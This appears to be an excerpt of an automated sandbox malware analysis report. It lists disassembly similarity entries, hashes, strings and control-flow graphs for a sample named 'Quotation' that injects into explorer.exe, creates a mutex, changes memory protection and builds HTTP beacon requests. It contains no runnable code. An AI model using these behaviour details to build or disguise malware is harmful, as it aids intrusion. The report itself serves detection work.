                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: de3ff00218ebf6a52bcb507c7121b3cdcdbdb45751ca90ac4f48e57f27f524bd
                                                              • Instruction ID: c021cd3c2f6245ef3a9832c7bce2ce82c7ecf28263df54d317a4f8a0c32ea934
                                                              • Opcode Fuzzy Hash: de3ff00218ebf6a52bcb507c7121b3cdcdbdb45751ca90ac4f48e57f27f524bd
                                                              • Instruction Fuzzy Hash: BDE19D74614781DFE711CF28C980B5AB7F0BF84368F140A59E5A48B2E1DB78D946CB82
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3446177414-3610490719
                                                              • Opcode ID: 0f680d74e8b98ac556a2094d9171a3325f0cfb0b618082e0df3fa4ee9cdf8c66
                                                              • Instruction ID: b4ab9fb74ac1b23cca8861f41b6f72dcf6290ddcd658ee6d600d6dd31a57e141
                                                              • Opcode Fuzzy Hash: 0f680d74e8b98ac556a2094d9171a3325f0cfb0b618082e0df3fa4ee9cdf8c66
                                                              • Instruction Fuzzy Hash: 73910571A14741DFE315CF24D890B7AB7A8BF88E44F090659F9809B791DB34E842CBD2
                                                              APIs
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 33EBA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EBA121
                                                              • Failed to allocated memory for shimmed module list, xrefs: 33EBA10F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-161242083
                                                              • Opcode ID: 92eca8d37b293f15f3baf1a4fa8004b92511aec3ce3a86d07d4175948222ea98
                                                              • Instruction ID: 172b277afd94d31370464058bfb409d545a15be175a15613d55833e9f3f43043
                                                              • Opcode Fuzzy Hash: 92eca8d37b293f15f3baf1a4fa8004b92511aec3ce3a86d07d4175948222ea98
                                                              • Instruction Fuzzy Hash: BC718D75E00305DFEB05DF68C990AAEBBF4EF44208F584469E455E7651E738ED42CB90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 3446177414-2283098728
                                                              • Opcode ID: 1f39c9e8d9fa9ed656a3fed84d5ef829001f2df20d4da775945e760c964547eb
                                                              • Instruction ID: 76e236ec23539a51b7d0f2ac605f0a1812dd9e698cfedc92dcd73a6b04980c71
                                                              • Opcode Fuzzy Hash: 1f39c9e8d9fa9ed656a3fed84d5ef829001f2df20d4da775945e760c964547eb
                                                              • Instruction Fuzzy Hash: C051F071A157029FF714DF24C884B6AB7B5BF84218F480A2DF8A59B691EB70E841CB81
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33EC728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 33EC72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 33EC7294
                                                              • RTL: Re-Waiting, xrefs: 33EC72C1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: e36e515ba17aeb5a6a9a810f92e58bfd32ab5531cf28ceed8f2e76d7d645ba19
                                                              • Instruction ID: c135b25450b0c3c26454e841e0dd40b162a6010a6c5c523aa30e94d8afb359c3
                                                              • Opcode Fuzzy Hash: e36e515ba17aeb5a6a9a810f92e58bfd32ab5531cf28ceed8f2e76d7d645ba19
                                                              • Instruction Fuzzy Hash: 994120B5A00746AFE714CE24CC41B5AB7B5FF84764F180619F8A8EB640EB20E806DBD0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: dee370146f7ce9a5cc0e239b98721fbf9d6c4daa21ef67b5a57cc8f1481b23a4
                                                              • Instruction ID: eac3a4ca0bebb774b8303722bd11f7fbaa9b557125cbdf129037d5582c38727f
                                                              • Opcode Fuzzy Hash: dee370146f7ce9a5cc0e239b98721fbf9d6c4daa21ef67b5a57cc8f1481b23a4
                                                              • Instruction Fuzzy Hash: 6A713675E003999FDF04CFA8CA80ADDBBB5BF48354F58412AE905FB259D734A906CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: ede55500ca11cb995e1fc5e787f552f8d6a080d029c23b76fee7a27a96b16009
                                                              • Instruction ID: a76c13eb22910aee6aec01a8fbff1c1448d52155c109f0fe4bc210232883f1a3
                                                              • Opcode Fuzzy Hash: ede55500ca11cb995e1fc5e787f552f8d6a080d029c23b76fee7a27a96b16009
                                                              • Instruction Fuzzy Hash: 9A516979710A12DFEF08CE58C4A2A1ABBF5FB89350B944A69D906DB710DF74EC41CB80
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 2b9f1521a902e68a7c88f5e266a05c24b45d1bb86dbcaa21fa1e14da62b5891c
                                                              • Instruction ID: 8642eb18d3ce7bcdb113fa45af94fb3c86b42fb023042efa9b7052f1e91b32a3
                                                              • Opcode Fuzzy Hash: 2b9f1521a902e68a7c88f5e266a05c24b45d1bb86dbcaa21fa1e14da62b5891c
                                                              • Instruction Fuzzy Hash: E45134B5E00259EFDF08CF98DA41ADDBBB5BF48355F14822AE815BB254D734A902CF50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                              • String ID:
                                                              • API String ID: 4281723722-0
                                                              • Opcode ID: 1e9c485d9f5e3eaa96f975e868a22ba9318b61c6a98f3d00f46994cf408ff518
                                                              • Instruction ID: 8f08fbfe2665a885a803cd2455ed9714ec11cfb173b31d4832ac9496d459275d
                                                              • Opcode Fuzzy Hash: 1e9c485d9f5e3eaa96f975e868a22ba9318b61c6a98f3d00f46994cf408ff518
                                                              • Instruction Fuzzy Hash: C6312576E01218AFCF05EFA8C955A9EBBF0BB48720F10412AE422B7690DB359941CF94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: bb8822874106ab459ef4cb95f77ae9f7eaec2a1a23e21bfdaf6976cf8de487da
                                                              • Instruction ID: b9a7b0f5197d601548ec2d869c167295048dd534adbbfe2532c370c23c0e70ec
                                                              • Opcode Fuzzy Hash: bb8822874106ab459ef4cb95f77ae9f7eaec2a1a23e21bfdaf6976cf8de487da
                                                              • Instruction Fuzzy Hash: 9A324774D04369DFEB21CF64C984BDDBBB4BB08308F0441E9E559A7681DBB4AA84CF91
                                                              APIs
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33E5063D
                                                              • kLsE, xrefs: 33E50540
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 3446177414-2547482624
                                                              • Opcode ID: 55c103a6b1d865d8ae508bf606bcaa2096536b5cad104b16292082436a652203
                                                              • Instruction ID: 1a9afacdc1e5ede6a0c91963df5a5d7c6ea3ad5a6fb2a26c463e773e33c8a315
                                                              • Opcode Fuzzy Hash: 55c103a6b1d865d8ae508bf606bcaa2096536b5cad104b16292082436a652203
                                                              • Instruction Fuzzy Hash: D951EFB55017468FE724DF24C440697B7F8AF84309F04483EF9AA87A40E778D945CF92
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0$0
                                                              • API String ID: 3446177414-203156872
                                                              • Opcode ID: eb38bf7e2adb623754a154b02fbc111bf27826ed77d044050bd520db06243706
                                                              • Instruction ID: 6f86f30357978edee461f7479bc4b29290cc60796d0112e77279ee030bb57ee3
                                                              • Opcode Fuzzy Hash: eb38bf7e2adb623754a154b02fbc111bf27826ed77d044050bd520db06243706
                                                              • Instruction Fuzzy Hash: 01417CB1A087059FD310CF68D594A5BBBE8BB8C318F05492EF488DB351D771E905CB96

                                                              Execution Graph

                                                              Execution Coverage:1.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:419
                                                              Total number of Limit Nodes:14

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: `
                                                              • API String ID: 823142352-2679148245
                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                              • Instruction ID: a7bfdd33392cac2777adfdae5ae94caffed0d9181bf8931a74ad07767b8204d2
                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                              • Instruction Fuzzy Hash: AD224D70A18A09AFCB59DF28C4957AEFBE1FB58301F50462ED45EE3650DB30E5A1CB81

                                                              Control-flow Graph

                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL ref: 0B142E67
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                              • Instruction ID: 6738f06b7875430b065b5054dce75a5bcdef8727f0240eb63ed803f922b9fb3a
                                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                              • Instruction Fuzzy Hash: 2101B130668B484F8B88EF6CE48122AB7E4FBCD314F000B3EE99AC3254EB70C5414782

Control-flow Graph
control_flow_graph 435 b142e0a-b142e38 436 b142e45-b142e6e NtProtectVirtualMemory 435->436 437 b142e40 call b141942 435->437 438 b142e70-b142e7c 436->438 439 b142e7d-b142e8f 436->439 437->436
APIs
• NtProtectVirtualMemory.NTDLL ref: 0B142E67
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: a2bc0114a0696f67b452de8fadbc733e7699498bc3b0535f0a8fbd0539f7bfbf
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: ED01A234628B884F8B48EB2C94412A6B7E5FBCE314F000B3EE99AC3240DB31D5024782

Control-flow Graph
control_flow_graph 0 b141f82-b141fb6 1 b141fd6-b141fd9 0->1 2 b141fb8-b141fbc 0->2 4 b1428fe-b14290c 1->4 5 b141fdf-b141fed 1->5 2->1 3 b141fbe-b141fc2 2->3 3->1 6 b141fc4-b141fc8 3->6 7 b1428f6-b1428f7 5->7 8 b141ff3-b141ff7 5->8 6->1 9 b141fca-b141fce 6->9 7->4 10 b141fff-b142000 8->10 11 b141ff9-b141ffd 8->11 9->1 12 b141fd0-b141fd4 9->12 13 b14200a-b142010 10->13 11->10 11->13 12->1 12->5 14 b142012-b142020 13->14 15 b14203a-b142060 13->15 14->15 16 b142022-b142026 14->16 17 b142062-b142066 15->17 18 b142068-b14207c call b13e5b2 15->18 16->7 19 b14202c-b142035 16->19 17->18 20 b1420a8-b1420ab 17->20 22 b142081-b1420a2 18->22 19->7 23 b142144-b142150 20->23 24 b1420b1-b1420b8 20->24 22->20 26 b1428ee-b1428ef 22->26 25 b142156-b142165 23->25 23->26 27 b1420e2-b1420f5 24->27 28 b1420ba-b1420dc call b141942 24->28 29 b142167-b142178 call b13e552 25->29 30 b14217f-b14218f 25->30 26->7 27->26 32 b1420fb-b142101 27->32 28->27 29->30 34 b1421e5-b14221b 30->34 35 b142191-b1421da call b13e732 30->35 32->26 37 b142107-b142109 32->37 40 b14222d-b142231 34->40 41 b14221d-b14222b 34->41 35->34 49 b1421dc-b1421e1 35->49 37->26 42 b14210f-b142111 37->42 45 b142247-b14224b 40->45 46 b142233-b142245 40->46 44 b14227f-b142280 41->44 42->26 47 b142117-b142132 getaddrinfo 42->47 48 b142283-b1422e0 call b142d62 call b13f482 call b13ee72 call b143002 44->48 50 b142261-b142265 45->50 51 b14224d-b14225f 45->51 46->44 47->23 52 b142134-b14213c 47->52 63 b1422f4-b142354 call b142d92 48->63 64 b1422e2-b1422e6 48->64 49->34 53 b142267-b14226b 50->53 54 b14226d-b142279 50->54 51->44 52->23 53->48 53->54 54->44 69 b14248c-b1424b8 call b142d62 call b143262 63->69 70 b14235a-b142396 call b142d62 call b143262 call b143002 63->70 64->63 66 b1422e8-b1422ef call b13f042 64->66 66->63 79 b1424d9-b142590 call b143262 * 3 call b143002 * 2 call b13f482 69->79 80 b1424ba-b1424d5 69->80 85 b142398-b1423b7 call b143262 call b143002 70->85 86 b1423bb-b1423e9 call b143262 * 2 70->86 111 b142595-b1425b9 call b143262 79->111 80->79 85->86 100 b142415-b14241d 86->100 101 b1423eb-b142410 call b143002 call b143262 86->101 105 b142442-b142448 100->105 106 b14241f-b142425 100->106 101->100 105->111 112 b14244e-b142456 105->112 109 b142467-b142487 call b143262 106->109 110 b142427-b14243d 106->110 109->111 110->111 121 b1425d1-b1426ad call b143262 * 7 call b143002 call b142d62 call b143002 call b13ee72 call b13f042 111->121 122 b1425bb-b1425cc call b143262 call b143002 111->122 112->111 116 b14245c-b14245d 112->116 116->109 133 b1426af-b1426b3 121->133 122->133 135 b1426b5-b1426fa call b13e382 call b13e7b2 133->135 136 b1426ff-b14272d call b13e6b2 133->136 158 b1428e6-b1428e7 135->158 143 b14275d-b142761 136->143 144 b14272f-b142735 136->144 148 b142767-b14276b 143->148 149 b14290d-b142913 143->149 144->143 147 b142737-b14274c 144->147 147->143 152 b14274e-b142754 147->152 153 b142771-b142773 148->153 154 b1428aa-b1428df call b13e7b2 148->154 155 b142779-b142784 149->155 156 b142919-b142920 149->156 152->143 160 b142756 152->160 153->154 153->155 154->158 161 b142786-b142793 155->161 162 b142795-b142796 155->162 156->161 158->26 160->143 161->162 165 b14279c-b1427a0 161->165 162->165 167 b1427b1-b1427b2 165->167 168 b1427a2-b1427af 165->168 170 b1427b8-b1427c4 167->170 168->167 168->170 173 b1427f4-b142861 170->173 174 b1427c6-b1427ef call b142d92 call b142d62 170->174 185 b1428a3-b1428a4 173->185 186 b142863 173->186 174->173 185->154 186->185 188 b142865-b14286a 186->188 188->185 190 b14286c-b142872 188->190 190->185 192 b142874-b1428a1 190->192 192->185 192->186
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: getaddrinfo
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 300660673-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 9fa2341a29c7eecc2caa9d189de59c7ba12a140dfa64137f352d3a1ef340efb9
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: 05526E30624A088FCB29EF68D494BE9B7E1FB54300F50462ED4AFD7146DF70A58ACB85

Control-flow Graph
APIs
• ObtainUserAgentString.URLMON ref: 0B13C9A0
Strings
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: 724014bf73cfe806b4392c4fdd7279acfd0bb330a887e4ed22d2e35e2a4e8a27
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: EC31D171614A0C8FCB14EFA8D8857EDBBE0FB58205F40022AD45EE7240EF748645C789

Control-flow Graph
APIs
• ObtainUserAgentString.URLMON ref: 0B13C9A0
Strings
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: 908b9521c26c23dee6d7bc1fefa2907cf4ceed413475fc770227bce02c5897d0
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: 3021D270A14A0C8FCB15EFA8D8957EDBBF4FF58205F40422AE45AE7240EF748645C789

Control-flow Graph
control_flow_graph 234 b138b66-b138b68 235 b138b93-b138bb8 234->235 236 b138b6a-b138b71 234->236 238 b138bbb-b138c22 call b13f612 call b141942 * 2 235->238 236->238 239 b138b73-b138b92 236->239 246 b138c28-b138c2b 238->246 247 b138cdc 238->247 239->235 246->247 249 b138c31-b138cb0 call b143da4 call b143022 call b1433e2 call b143022 call b1433e2 246->249 248 b138cde-b138cf6 247->248 261 b138cb5-b138cca CreateMutexExW 249->261 262 b138cce-b138cd3 261->262 262->247 263 b138cd5-b138cda 262->263 263->248
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: ed0255df83abc0cadaa90d621beff96f8aa9cade817219c2509882cf516fcc18
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: BC417970918A088FCB94EFA8C8957AD77E0FB58300F04027AD84ADB255EF309945CB85

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: 85e09bb5f4108dd22562d2053e65108926ec61250b145bbe1bd1eec117d74e91
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: 17412970918A088FDB94EFA8D499BED77F0FB68300F44417AD84ADB255EF309945CB85

Control-flow Graph
control_flow_graph 399 b13e5b2-b13e5ea 400 b13e60a-b13e62b socket 399->400 401 b13e5ec-b13e604 call b141942 399->401 401->400
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: 45ee3af885bc1f19e588ed47895aba5a3c53c1286d1ee8efa855fe125897f980
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: 7B012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85EDB266D7B0C9858B86

Control-flow Graph
control_flow_graph 404 b1362dd-b136320 call b141942 407 b136326 404->407 408 b1363fa-b13640e 404->408 409 b136328-b136339 SleepEx 407->409 409->409 410 b13633b-b136341 409->410 411 b136343-b136349 410->411 412 b13634b-b136352 410->412 411->412 413 b13635c-b13636a call b140f12 411->413 414 b136370-b136376 412->414 415 b136354-b13635a 412->415 413->414 417 b1363b7-b1363bd 414->417 418 b136378-b13637e 414->418 415->413 415->414 419 b1363d4-b1363db 417->419 420 b1363bf-b1363cf call b136e72 417->420 418->417 422 b136380-b13638a 418->422 419->409 424 b1363e1-b1363f5 call b1360f2 419->424 420->419 422->417 425 b13638c-b1363b1 call b137432 422->425 424->409 425->417
APIs
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
